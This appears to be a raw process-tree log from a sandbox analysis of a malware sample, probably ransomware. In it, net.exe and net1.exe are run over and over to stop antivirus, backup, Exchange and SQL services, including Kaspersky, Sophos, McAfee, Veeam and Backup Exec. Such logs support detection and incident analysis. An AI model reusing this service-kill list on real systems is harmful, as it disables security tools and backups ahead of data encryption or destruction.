C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6704
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop kavfsslp /y2⤵PID:7360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y3⤵PID:7040
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop klnagent /y2⤵PID:7076
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y3⤵PID:7252
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop AVP /y2⤵PID:3932
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SOPHOS /y2⤵PID:6148
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SOPHOS /y2⤵PID:6992
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ESHASRV /y2⤵PID:7692
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EhttpSrv /y2⤵PID:7404
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop NetMsmqActivator /y2⤵PID:7792
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop msftesql$PROD /y2⤵PID:7540
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLServerADHelper /y2⤵PID:8104
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Zoolz 2 Service" /y2⤵PID:7068
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "SQL Backups" /y2⤵PID:6496
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$CITRIX_METAFRAME /y2⤵PID:6092
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$CXDB /y2⤵PID:7640
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:7656
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:6640
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop wbengine /y2⤵PID:6348
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop W3Svc /y2⤵PID:5772
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamNFSSvc /y2⤵PID:6608
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamEnterpriseManagerSvc /y2⤵PID:6216
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamDeploySvc /y2⤵PID:7964
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamDeploymentService /y2⤵PID:5132
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamCloudSvc /y2⤵PID:6812
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TmCCSF /y2⤵PID:6632
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_service /y2⤵PID:6932
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLWriter /y2⤵PID:7420
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵PID:7612
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLBrowser /y2⤵PID:6240
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SYSTEM_BGC /y2⤵PID:7792
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SBSMONITORING /y2⤵PID:6716
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$ECWDB2 /y2⤵PID:7508
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$BKUPEXEC /y2⤵PID:6292
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SNAC /y2⤵PID:7408
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y3⤵PID:7172
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6812
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SMTPSvc /y2⤵PID:6136
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SDRSVC /y2⤵PID:6508
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SAVService /y2⤵PID:7512
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SamSs /y2⤵PID:6776
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop sacsvr /y2⤵PID:6772
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop RESvc /y2⤵PID:7616
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$TPSAMA /y2⤵PID:6852
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$TPS /y2⤵PID:7124
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$SQL_2008 /y2⤵PID:6560
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer /y2⤵PID:6432
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop POP3Svc /y2⤵PID:6924
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop PDVFSService /y2⤵PID:7816
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfevtp /y3⤵PID:5504
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ntrtscan /y2⤵PID:6256
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MySQL57 /y2⤵PID:7464
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MySQL80 /y2⤵PID:6724
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLServerADHelper100 /y2⤵PID:7596
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPS /y2⤵PID:7732
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SQL_2008 /y2⤵PID:7208
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SHAREPOINT /y2⤵PID:6248
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵PID:6368
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵PID:6412
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SHAREPOINT /y2⤵PID:6452
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SBSMONITORING /y2⤵PID:7408
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PRACTTICEBGC /y2⤵PID:7268
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$ECWDB2 /y2⤵PID:6260
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$BKUPEXEC /y2⤵PID:7164
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$TPSAMA /y2⤵PID:6264
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$TPS /y2⤵PID:6980
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$SQL_2008 /y2⤵PID:6528
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeSRS /y2⤵PID:6876
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeMGMT /y2⤵PID:6844
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeIS /y2⤵PID:7364
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Safestore Service" /y1⤵PID:6952
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:6088
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y1⤵PID:5932
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y1⤵PID:2392
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:6200
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y1⤵PID:8180
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y1⤵PID:6764
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y1⤵PID:6796
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y1⤵PID:6384
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:6688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y1⤵PID:6604
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y1⤵PID:6148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y2⤵PID:2364
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:6524
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sacsvr /y1⤵PID:7192
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SNAC /y1⤵PID:7324
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y1⤵PID:8104
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y2⤵PID:6944
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y1⤵PID:7368
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y1⤵PID:7160
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y1⤵PID:6236
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:6416
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y1⤵PID:6612
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop W3Svc /y1⤵PID:7228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y1⤵PID:7600
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:7868
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MMS /y3⤵PID:6308
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y1⤵PID:7464
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Zoolz 2 Service" /y1⤵PID:7972
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y1⤵PID:7080
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y1⤵PID:7324
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y1⤵PID:6932
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_service /y2⤵PID:7624
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y1⤵PID:6292
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y2⤵PID:7532
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y1⤵PID:6764
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y2⤵PID:7188
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AVP /y1⤵PID:6164
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQL Backups" /y1⤵PID:6576
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:7160
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y1⤵PID:8052
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y1⤵PID:6236
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:7380
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y1⤵PID:7408
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:6520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y1⤵PID:7660
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:6320
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y1⤵PID:8072
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:6440
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y1⤵PID:7736
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y1⤵PID:6940
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:7824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y1⤵PID:6644
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y1⤵PID:6316
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:7684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y1⤵PID:7156
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y2⤵PID:7632
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVService /y1⤵PID:6980
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y2⤵PID:6348
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y1⤵PID:7088
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RESvc /y1⤵PID:7076
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y1⤵PID:6572
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:7092
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:6644
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y1⤵PID:7780
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:7040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y2⤵PID:7336
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:5188
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:7700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y1⤵PID:7052
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:6856
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y1⤵PID:5152
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y1⤵PID:6388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y1⤵PID:7564
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:6828
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:6372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y1⤵PID:5816
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y1⤵PID:6332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y1⤵PID:6272
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y1⤵PID:5932
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:6696
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:7052
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:6220